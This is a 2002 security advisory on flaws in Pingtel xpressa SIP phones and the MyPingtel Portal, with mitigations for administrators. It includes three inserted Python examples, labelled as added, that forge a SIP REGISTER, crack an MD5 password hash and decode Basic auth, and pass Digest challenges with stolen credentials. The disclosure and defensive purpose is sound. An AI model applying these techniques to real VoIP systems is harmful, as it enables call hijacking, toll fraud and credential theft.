The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP Phones"
Release Date: 08/20/2002
Affected Platforms: Pingtel xpressa SIP IP phones model PX-1 with software
version 2.0.1 and below; Pingtel instant xpressa softphones with software
version 2.0.1 and below
Severity: High
Author: Ofir Arkin ([EMAIL PROTECTED])
Summary
Pingtel (http://www.pingtel.com) develops intelligent Java-based
voice-over-IP phones and softphones for service providers and
enterprises.
Using the vulnerabilities enumerated within this advisory it is possible
to jeopardize critical telephony infrastructure based on Pingtel's
xpressa SIP-based IP phones and softphones. Additionally, certain
vulnerabilities allow an attacker to take complete control over an IP
Phone or a softphone node either directly or by circumventing other SIP
entities on the network by abusing the 'node's credentials'.
The most severe issue discussed is the way an attacker can exploit
vulnerabilities with MyPingtel Portal (http://my.pingtel.com) to subvert
a VoIP infrastructure which includes IP Phones and/or softphones from
Pingtel.
Full Details in PDF format (~500kb):
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with_Pingtel_xpressa_Phones.pdf
Full Details in HTML format:
http://www.sys-security.com/archive/advisories/html/More_Vulnerabilities_with_Pingtel_xpressa_Phones.htm
Moderated text version is attached to this email and available from:
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with_Pingtel_xpressa_SIP-based_IP_phones.txt
Ofir Arkin [[EMAIL PROTECTED]]
Founder
The Sys-Security Group
http://www.sys-security.com
PGP CC2C BE53 12C6 C9F2 87B1 B8C6 0DFA CF2D D360 43FA
For more information: http://www.sys-security.com
Copyright (c) The Sys-Security Group 2002, all rights reserved.
The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP phones"
Background Information
Please see the full advisory, available from the Sys-Security Group's web site,
for more information on VoIP, SIP, and SIP registrars.
A PDF is available from:
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with_Pingtel_xpressa_Phones.pdf
An HTML version is available from:
http://www.sys-security.com/archive/advisories/html/More_Vulnerabilities_with_Pingtel_xpressa_Phones.htm
The Vulnerabilities
A. Predictable Parameter Values with SIP REGISTER requests sent from Pingtel's
IP Phones
The following is a SIP REGISTER request sent from a Pingtel SIP-based IP Phone
to a SIP Registrar SERVER:
REGISTER sip:192.168.1.57 SIP/2.0
To: sip:[EMAIL PROTECTED]
From: sip:[EMAIL PROTECTED];tag=456248
Call-ID: [EMAIL PROTECTED]
CSeq: 1 REGISTER
Contact: sip:[EMAIL PROTECTED]
Expires: 3600
Content-Length: 0
Accept-Language: en
Supported: sip-cc, sip-cc-01, timer
User-Agent: Pingtel/1.2.6 (VxWorks)
Via: SIP/2.0/UDP 192.168.1.59
The values an attacker needs in order to subvert a registration with this
request are all predictable. The "Call-ID" is fixed (with other Pingtel IP
phones it was always "9-reg@myIP"), the CSeq sent is 1 (so any higher number
suffices), and the "To" and "From" SIP URIs follow from the user's address. A
remote attacker can therefore forge a REGISTER for any user and, through the
SIP Registrar, write arbitrary bindings into the location service, provided
no authentication is required.
Where authentication is required, the attacker first needs the right
credentials for the user before being able to write false records into the
location service through the SIP Registrar. There are, however, a number of
ways to extract the username and password from a Pingtel SIP-based IP phone,
some outlined in this advisory and others in [1].
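The following is an added example, not code from the advisory or from Pingtel. It models a minimal SIP registrar location service that applies the binding-update rule of RFC 3261 section 10.3 (for the same Call-ID the CSeq must increase; a new Call-ID is always accepted) and shows why a REGISTER whose Call-ID ("9-reg@<phone IP>"), CSeq (1), To and From are predictable lets a remote party overwrite a user's binding when the registrar does not authenticate. The user name "alice" and the attacker host 10.9.8.7 are constructed placeholders; 192.168.1.57 and 192.168.1.59 are the registrar and phone addresses from the captured request above.

```python
"""Added example: forged REGISTER against a registrar with and without
authentication. Not Pingtel's code; the registrar is a toy model of RFC 3261
section 10.3 binding updates."""


def build_register(registrar, user, domain, contact_host, call_id, cseq, via_host):
    """Build a REGISTER request with the same header set the phone sends."""
    return (
        f"REGISTER sip:{registrar} SIP/2.0\r\n"
        f"To: sip:{user}@{domain}\r\n"
        f"From: sip:{user}@{domain};tag=456248\r\n"
        f"Call-ID: {call_id}\r\n"
        f"CSeq: {cseq} REGISTER\r\n"
        f"Contact: sip:{user}@{contact_host}\r\n"
        "Expires: 3600\r\n"
        "Content-Length: 0\r\n"
        f"Via: SIP/2.0/UDP {via_host}\r\n"
        "\r\n"
    )


def parse_headers(msg):
    """Return (request line, {lower-cased header name: value})."""
    lines = msg.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:                      # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def bare_uri(header_value):
    """Strip angle brackets and parameters, keeping only 'sip:user@host'."""
    value = header_value.split(";")[0].strip()
    if "<" in value:
        value = value[value.index("<") + 1:value.index(">")]
    return value


class Registrar:
    """Location service keyed by address-of-record (the To URI)."""

    def __init__(self, require_auth=False):
        self.require_auth = require_auth
        self.bindings = {}                # aor -> {"contact", "call_id", "cseq"}

    def handle(self, msg):
        """Return the SIP status code the registrar would answer with."""
        _, h = parse_headers(msg)
        if self.require_auth and "authorization" not in h:
            return 401                    # challenge; the forged request has no credentials
        aor = bare_uri(h["to"])
        cseq = int(h["cseq"].split()[0])
        existing = self.bindings.get(aor)
        # RFC 3261 10.3 step 7: with the same Call-ID the CSeq must be higher,
        # otherwise the update is aborted. A different Call-ID is always accepted.
        if existing and existing["call_id"] == h["call-id"] and cseq <= existing["cseq"]:
            return 400
        self.bindings[aor] = {"contact": bare_uri(h["contact"]),
                              "call_id": h["call-id"], "cseq": cseq}
        return 200


def demo():
    registrar, phone_ip, attacker_ip = "192.168.1.57", "192.168.1.59", "10.9.8.7"
    call_id = f"9-reg@{phone_ip}"         # the fixed Call-ID the advisory reports
    legit = build_register(registrar, "alice", registrar, phone_ip, call_id, 1, phone_ip)
    # The attacker copies the predictable fields, raises CSeq and points Contact at itself.
    forged = build_register(registrar, "alice", registrar, attacker_ip, call_id, 2, attacker_ip)

    open_reg = Registrar()
    r_legit = open_reg.handle(legit)
    r_forged = open_reg.handle(forged)
    hijacked_contact = open_reg.bindings[f"sip:alice@{registrar}"]["contact"]
    # If the phone resends its CSeq 1 request under the same Call-ID, the
    # ordering rule now rejects it, so the attacker's binding stays in place.
    r_replay = open_reg.handle(legit)

    auth_reg = Registrar(require_auth=True)
    r_forged_auth = auth_reg.handle(forged)
    return r_legit, r_forged, hijacked_contact, r_replay, r_forged_auth


if __name__ == "__main__":
    print(demo())   # (200, 200, 'sip:alice@10.9.8.7', 400, 401)
```

Note that a registrar following RFC 3261 also accepts a REGISTER with a fresh Call-ID, so guessing the Call-ID only matters for registrars that are stricter than the RFC; what actually protects the binding is authentication, which section C shows is hollow when the SIP credentials are the same ones leaked through the Portal.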
B. Compromising VoIP infrastructure using the MyPingtel Portal
MyPingtel is a portal (http://my.pingtel.com) through which a user manages his
Pingtel xpressa softphone or IP phone. The MyPingtel web site can be used to:
"Learn about new applications and services and install them from your
PC. Create and manage your speed dial phone book using the PC
keyboard. Set your call handling preferences for call forwarding when
you're away from the phone and on the phone. Get tips and online help
for using your phone. Stay current with news from Pingtel..."
In order to use the Portal, a user needs to register his Pingtel xpressa
SIP-based IP phone with the MyPingtel Portal. This is done in two stages: the
user registers with Pingtel's Portal, and then registers his IP phone
(physically accessing the IP phone) using the details (and credentials) he
supplied when registering with the Portal.
This first stage is simply accomplished by browsing to http://my.pingtel.com
and filling the required registration form[2].
The user's credentials supplied to Pingtel's Portal with the registration
process must be a valid username and password that allows the registering user
to login to his IP phone via the web server interface of his IP Phone.
The next step would be to use the MyPingtel Sign-In application, which is
supplied by default with Pingtel's IP phone and softphone, to register the IP
phone, physically accessing the phone. This is simply done by pressing:
More -> MyPingtel Sign-In -> Next -> [Enter your username] ->
[Enter your password] -> OK -> [Enter Admin Password] ->
[Enter Phone Name] -> Next -> OK
A message will be displayed confirming the registration[3].
B.1 E.T. Phones Home - Information Leakage leading to the compromise of the IP
Phone
When the IP phone (or softphone) boots up, it sends all of its registration
information to Pingtel's MyPingtel Portal (http://my.pingtel.com) over HTTP.
The information sent to the Portal includes:
- Admin name in clear text
- Admin Password in MD5 hash
- Mac Address in clear text
- Physical Password in MD5 hash
- Admin Domain in clear text
- IP Address of the IP phone in clear text
- Web Server Port in clear text
- And other information
Any malicious party able to capture this information on the wire (upstream
towards Pingtel, on the phone's local network, on an intermediate network, etc.)
can brute force the user's password offline, by hashing candidate passwords
with the same algorithm and comparing the results against the captured hash.
A malicious party might also brute force the password online, either against
the IP phone's web server or through Pingtel's Portal.
The value of the information is even greater when the IP address of the IP
phone is routable from the Internet. This will allow a remote attacker to
connect to the IP phone's web server remotely (the web server access is
required for the operation of MyPingtel Portal) either directly or through
MyPingtel Portal using the credentials he extracted.
Although administrator access is needed to change some of the IP phone's
settings (the username is "admin" and the out-of-the-box password is blank),
any valid username and password allows a malicious party to tamper with the
"Call Handling" features of the IP phone, such as the various "Call
Forwarding" features[4].
B.2 E.T. Gets a Call - Information Leakage leading to the compromise of the IP
Phone
To use Pingtel's Portal one needs to supply a username and password. The web
page is composed of two parts: the left part contains a login form served over
HTTP over SSL (HTTPS), while the right part is simply a list of applications
and other miscellaneous pieces of information.
B.2.1 Username and password enumeration using the http://my.pingtel.com Web
Site
The problems start even before successfully authenticating to the web site,
since the site is kind enough to tell you whether the username exists or
not, and of course when the password is wrong.
This allows any malicious party to actively enumerate every user ever
registered with MyPingtel Portal and then guess that user's password online
(no account lockout policy seems to be in place).
B.2.2 What a successful authentication can bring...
If the authentication to Pingtel's Portal is successful, MyPingtel Portal will
send an authentication request to the authenticated user's IP phone's web
server with the user's credentials (the same credentials used to logon to the
Portal). Since the IP Phone sent its IP address and web server port number,
among other pieces of data, to the Portal when a user registered its IP phone
to MyPingtel services (and automatically after every boot-up if no changes are
made), the Portal will have the knowledge to which IP address to send the
authentication request to.
The problem is that the Pingtel xpressa SIP-based IP phone's (and softphone's)
web server only accepts HTTP Basic authentication, in which the username and
password are merely Base64-encoded, not encrypted. Any malicious party able to
capture the Portal's request on the wire (downstream from Pingtel, on the
phone's local network, on an intermediate network, etc.) reads the username and
password of a legitimate user of that particular IP phone directly.
The value of the information is even greater when the IP address of the IP
phone is routable from the Internet. This will allow a remote attacker to
connect to the IP phone's web server remotely (the web server access is
required for the operation of MyPingtel Portal) either directly or through
MyPingtel Portal using the credentials he extracted.
Although administrator access is needed to change some of the IP phone's
settings (the username is "admin" and the out-of-the-box password is blank),
any valid username and password allows a malicious party to tamper with the
"Call Handling" features of the IP phone, such as the various "Call
Forwarding" features[5].
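The following is an added example, not code from the advisory or from Pingtel, covering the two leaks in B.1 and B.2.2. The boot-time report carries the admin password as an MD5 hash; the example assumes an unsalted MD5 of the password (an assumption, the advisory does not give the exact construction), which a word-list attack breaks offline. The Portal's request to the phone uses HTTP Basic, which is Base64 encoding rather than encryption, so the header decodes directly. The captured report, the captured HTTP request and the word list are all constructed.

```python
"""Added example: recovering credentials from the B.1 boot-time report (MD5
hash, cracked offline) and from the B.2.2 Basic-auth request (decoded).
Not Pingtel's code; all captured data is constructed."""
import base64
import hashlib


def md5hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed sample of the fields the phone reports at boot (section B.1).
# The hash is built here only so the example runs offline; on a real network
# it is whatever was sniffed from the phone's HTTP request to the Portal.
CAPTURED_REPORT = {
    "admin_name": "admin",
    "admin_password_md5": md5hex("xpressa2"),   # assumed: unsalted MD5(password)
    "mac": "00-00-5e-00-53-01",
    "ip": "203.0.113.45",
    "web_port": "80",
}

# Constructed HTTP request as the Portal sends it to the phone's web server (B.2.2).
CAPTURED_HTTP_REQUEST = (
    "GET /cgi/callforward HTTP/1.0\r\n"
    "Host: 203.0.113.45\r\n"
    "Authorization: Basic " + base64.b64encode(b"alice:s3cret").decode() + "\r\n"
    "\r\n"
)

WORDLIST = ["password", "123456", "pingtel", "xpressa", "xpressa1", "xpressa2"]


def crack_md5(hex_digest, candidates):
    """Offline dictionary attack: hash each candidate the same way and compare.
    Returns (password or None, number of guesses made)."""
    target = hex_digest.lower()
    for tried, candidate in enumerate(candidates, start=1):
        if md5hex(candidate) == target:
            return candidate, tried
    return None, len(candidates)


def basic_auth_credentials(raw_request):
    """Return (user, password) from an HTTP Basic Authorization header, else None."""
    for line in raw_request.split("\r\n"):
        name, _, value = line.partition(":")
        if name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            return None                   # Digest or other scheme: not directly readable
        user, _, password = base64.b64decode(token).decode().partition(":")
        return user, password
    return None


def recover_all():
    """What an eavesdropper ends up with: admin login, user login, phone web URL."""
    admin_pw, guesses = crack_md5(CAPTURED_REPORT["admin_password_md5"], WORDLIST)
    user_creds = basic_auth_credentials(CAPTURED_HTTP_REQUEST)
    return {
        "admin": (CAPTURED_REPORT["admin_name"], admin_pw, guesses),
        "user": user_creds,
        "phone_web": f"http://{CAPTURED_REPORT['ip']}:{CAPTURED_REPORT['web_port']}/",
    }


if __name__ == "__main__":
    print(recover_all())
```

The word list is tiny for illustration; because the hash is fast, unsalted MD5, a real attacker would run millions of candidates per second, and the phone's own boot report tells him which IP address and port to use the result against.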
C. Onto the Critical Path
With the Pingtel xpressa SIP-based IP phones and softphones there are a number
of instances where user credentials will be required to be presented, for
example:
- When a non-privileged user or an "admin" wishes to use the IP phone's
web server to manage some of the IP phone's functionality.
- When outgoing SIP requests will have to be authenticated against the
targeted SIP entity before the entity will be willing to process the
requests.
The Pingtel xpressa SIP-based IP phone is able to have two different sets of
credentials for any user for those scenarios. One set of user credentials
allowing a user to use the IP phone's web server, and another to authenticate
the SIP requests the IP phone will make on behalf of that user targeting
different SIP entities within the VoIP network.
Unfortunately the documentation for Pingtel's xpressa SIP-based IP phones and
softphones does not make the appropriate distinction between the two cases and
does not highlight the enormous security hazard of using the same credentials
for both[6].
Therefore I believe that with several deployments of Pingtel's xpressa
SIP-based IP phones the credentials information was set the same for a user to
logon to the IP phone's web server and for authentication information for
outgoing SIP requests.
The credentials used for outgoing SIP requests and for accessing the IP
phone's web server are also the ones supplied during registration with
MyPingtel Portal. A user cannot create another IP phone user without the
"admin" password, so when registering with MyPingtel Portal he is limited to
the login name and password he uses for the IP phone's web server (and, in
most cases, for authenticating outgoing SIP requests), because those are the
credentials the Portal will later present to the phone's web server after he
authenticates to the Portal.
This will lead to the following scenario:
The credentials the Pingtel xpressa SIP-based IP phone presents when it must
authenticate a call request or a registration request to a SIP entity (or
entities) within the VoIP network it belongs to are the same credentials used
for the MyPingtel Portal and the MyPingtel Sign-In application on the IP
phone!
A malicious party able to extract the credentials from the MyPingtel Portal,
using one of the methods presented within this advisory, can pass any
authentication required by any SIP entity for that particular user!
The potential risk is devastating for the VoIP network where any authentication
required in order to block misuse of the network can now be easily bypassed:
- Using a user's credentials a malicious attacker will be able to
successfully authenticate to the SIP Registrar server and make
changes to the binding information stored in the location service
for that particular user.
This fault combined with the ability to predict SIP REGISTER request
parameters sent from Pingtel SIP-based IP Phones and softphones leads
to the total control of the binding information for a particular user.
This will allow, among other things, for a malicious party to
associate the user's SIP or SIPS URI with an IP address or a hostname
which do not represent the IP Phone. In other words it would allow a
malicious party to perform "Call Hijacking" in a very easy manner
even remotely!
- Abusing the SIP Registrar server would allow a malicious party to
forward incoming call requests outside of the organization whose
Pingtel xpressa SIP-based IP Phones, nodes and credentials have been
compromised.
- When a user places a call, he might need to provide authentication
information in order to be allowed to place the call. This is
usually performed for the user by its IP Phone where the user's
username and password are stored and used when needed. Since the
user's credentials are compromised, a malicious party will be able to
use the credentials he extracted to make free phone calls using the
VoIP network the Pingtel xpressa SIP-based IP phone(s) belongs to.
- Etc.
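The following is an added example, not code from the advisory or from Pingtel. It computes SIP Digest authentication (RFC 3261 section 22, which uses the RFC 2617 scheme) on both sides of a challenge, to show why the credential reuse described in section C lets a party holding the user's web-server password answer any challenge a SIP entity issues, and why a separate, undisclosed SIP password (as recommended under Temporary Solution) stops that. The realm, nonces, user name and passwords are constructed.

```python
"""Added example: SIP Digest challenge/response with stolen credentials.
Not Pingtel's code; the SIP entity is a toy verifier, no qop handling."""
import hashlib
import hmac
import secrets


def md5hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 response without qop: MD5(HA1:nonce:HA2),
    HA1 = MD5(user:realm:password), HA2 = MD5(method:uri)."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def authorization_header(username, realm, uri, nonce, response):
    """The header the client (phone or attacker) adds to the retried request."""
    return (f'Authorization: Digest username="{username}", realm="{realm}", '
            f'nonce="{nonce}", uri="{uri}", response="{response}"')


class SipEntity:
    """Registrar or proxy: issues 401 challenges and verifies Digest responses."""

    def __init__(self, realm, sip_passwords):
        self.realm = realm
        self.sip_passwords = sip_passwords    # username -> SIP password
        self.issued = set()                   # outstanding nonces

    def challenge(self):
        nonce = secrets.token_hex(8)
        self.issued.add(nonce)
        return nonce

    def verify(self, username, method, uri, nonce, response):
        if nonce not in self.issued:          # reject replayed or made-up nonces
            return False
        self.issued.discard(nonce)            # each nonce is good for one answer
        password = self.sip_passwords.get(username)
        if password is None:
            return False
        expected = digest_response(username, self.realm, password, method, uri, nonce)
        return hmac.compare_digest(expected, response)


def attacker_register(entity, stolen_user, stolen_password, uri="sip:example.net"):
    """Attacker answers the entity's challenge with credentials taken from the Portal.
    Returns (accepted?, the Authorization header it sent)."""
    nonce = entity.challenge()
    response = digest_response(stolen_user, entity.realm, stolen_password,
                               "REGISTER", uri, nonce)
    header = authorization_header(stolen_user, entity.realm, uri, nonce, response)
    return entity.verify(stolen_user, "REGISTER", uri, nonce, response), header


def demo():
    stolen = ("alice", "s3cret")          # web-server login recovered from the Portal leaks
    # Deployment as section C describes: one password for the web server and for SIP.
    shared = SipEntity("example.net", {"alice": "s3cret"})
    # Deployment per the Temporary Solution: a distinct SIP password the user never sees.
    separate = SipEntity("example.net", {"alice": "Kq4-sip-only-7"})
    shared_ok, _ = attacker_register(shared, *stolen)
    separate_ok, _ = attacker_register(separate, *stolen)
    return shared_ok, separate_ok


if __name__ == "__main__":
    print(demo())   # (True, False)
```

Once the REGISTER is accepted the attacker owns the binding (the call-hijacking case above); the same computation with method INVITE answers a proxy's challenge for an outgoing call, which is the free-calls case.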
D. More Issues
There are more, less severe issues I have found with Pingtel's xpressa IP
phones and softphones which are listed below allowing people to understand what
they are exposed to.
D.1 Availability - Random Reboots of the IP Phone
Using a Pingtel xpressa SIP-based IP Phone I have encountered situations where
the IP phone rebooted out of the blue. There was no attack launched on the
phone, and the network traffic was HTTP, HTTPS, POP3 and SMTP only.
Although this was not observed in small intervals, still the availability of
the IP phone, which is sometimes regarded as critical infrastructure, is at
risk.
I do feel it is not my role to perform various tests against the IP phone in
order to determine the exact cause of the random reboots. This is something I
leave to Pingtel and WindRiver (manufacturer of the VxWorks platform).
D.2 No verification of downloaded software
As part of the IP phone's boot-up process the IP phone fetches several Java
applications from Pingtel's web site. There is no integrity or authenticity
check on the downloaded software, so anyone able to tamper with the DNS records
involved could try to "feed" the IP phone a different (malicious?) application.
D.3 User Enumeration by Physically Accessing the IP phone
If physical access is gained to the phone, a malicious party will be able to
view the username one is using for his IP phone if using the MyPingtel Sign-In
application simply by pressing:
More -> MyPingtel Sign-In
If the user is using the MyPingtel Sign-In application, a message will be
displayed alerting that the IP phone is already signed in to MyPingtel and
showing the current signed-in login name and the server it is connected to.
This information should be hidden.
D.4 Hard coded usernames and passwords within web pages served with MyPingtel
Portal
Although the login to MyPingtel Portal is done over HTTPS, any malicious user
using a workstation previously used by a legitimate MyPingtel Portal user can,
by pressing the browser's back button and viewing the web page source, see in
clear text the user's username and password as well as the IP phone's IP
address.
Temporary Solution
There are a number of risk mitigation network configurations a VoIP network
administrator might do in order to mitigate some of the risk involved with
using Pingtel's xpressa SIP-based IP phones and softphones on his network:
Issues related to the configuration and usage of the IP phones:
- Deploy users using the IP Phone's admin GUI in a lab environment
BEFORE issuing the IP phone's to your users
- Change the "admin" password on the IP phones. Remember - the default
is blank!
- Shut down the Pingtel xpressa IP phone's web server after initial
setup if this function is not required or used by your users
- Configure different credentials set for each user for:
- Outgoing SIP requests that needs to be authenticated, and for
- Web Server logon for managing some of the IP phone's abilities
- Do not disclose the credentials needed to authenticate the outgoing
SIP requests to your users!
- Do not perform remote management tasks using the Pingtel xpressa IP
phone's web server since authentication is literally in clear text!
Issues related to MyPingtel Portal:
- Do not allow your users to use the MyPingtel Portal (actively block
this with the appropriate access controls on your network filtering
devices until the issues with this advisory are resolved), they can
directly access their Pingtel xpressa IP phone's locally. Educate
them how to do that!
- Do not allow your users to use the MyPingtel Sign-In application on
their Pingtel xpressa SIP-based IP phones (actively block this with
the appropriate access controls on your network filtering devices
until the issues in this advisory are resolved)
- Block access to http://my.pingtel.com
General Issues:
- Block access to your SIP Registrar server from the Internet (and from
other networks that should not access it)
- Make your VoIP network non-routable for users coming from the Internet
- Do not allow any access to your VoIP infrastructure from the Internet
Other type of solutions should be provided by Pingtel.
Conclusion
MyPingtel Portal does not take security into account which might lead to a
total compromise of any VoIP network using the MyPingtel Portal with Pingtel's
SIP-based IP phones and softphones. This is a direct result of the lack of
proper security centric documentation, understanding, and education on the part
of Pingtel.
This is another example of how a newcomer technology still needs to go through
several cycles before it can be regarded as "ok" to use with respect to its
security risks.
[1] Ofir Arkin & Joshua Anderson: Multiple Vulnerabilities with Pingtel xpressa
SIP Phones, July 12, 2002. Available from:
http://www.sys-security.com/archive/advisories/a071202-1.txt
[2] Although I have previously indicated to Pingtel that the information
entered is not validated against any record of sale or other, it is still
possible for anyone to register with completely fake information and be able to
receive the services from the Portal.
[3] When entering the password for the MyPingtel user, the last digit is
displayed forever on the instant xpressa softphones, making shoulder surfing
even easier than ever before.
[4] Please see section C for more hazards
[5] Please see section C for more hazards.
[6] Pingtel's own "Best Practices for Deploying Pingtel phones" document
(http://www.pingtel.com/docs/best_practices_20x.txt) does not address this
issue.